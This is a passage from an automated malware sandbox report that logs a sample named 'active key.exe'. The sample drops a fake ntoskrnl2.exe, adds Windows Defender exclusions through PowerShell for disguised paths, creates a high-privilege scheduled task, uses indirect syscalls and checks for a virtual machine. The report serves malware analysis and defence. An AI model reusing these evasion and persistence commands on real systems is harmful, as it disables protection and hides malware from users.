                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 30000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599885
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599781
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599562
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599426
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599267
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 599141
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598940
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 3600000
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598828
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598609
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598390
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598280
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598159
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 598047
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597935
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597827
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597605
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597500
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597383
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597272
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597156
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 597044
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596934
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596806
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596701
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596594
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596469
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596341
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596234
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 596123
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595999
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595890
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595776
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595672
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595547
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595437
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595317
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595200
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 595078
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594968
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594855
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594748
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 594535
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593719
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593589
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 593484
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 592930
                    Source: C:\Windows\System32\ntoskrnl2.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: ntoskrnl2.exe, 00000005.00000002.2385139643.000000001BDC6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef00
                    Source: active key.exe, 00000000.00000003.2258183311.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmp, active key.exe, 00000000.00000002.2261621368.000002CBC84A9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\active key.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeProcess token adjusted: Debug
                    Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess token adjusted: Debug
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeProcess token adjusted: Debug
                    Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\ntoskrnl2.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'Jump to behavior
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Users\user\Desktop\active key.exeNtProtectVirtualMemory: Indirect: 0x7FF6E99F21C0Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\ntoskrnl2.exe "C:\Windows\System32\ntoskrnl2.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\active key.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con cols=55 lines=15Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /fJump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe'Jump to behavior
                    Source: C:\Windows\System32\ntoskrnl2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\certutil.exe certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "md5" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /i /v "certutil"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\ntoskrnl2.exeQueries volume information: C:\Windows\System32\ntoskrnl2.exe VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
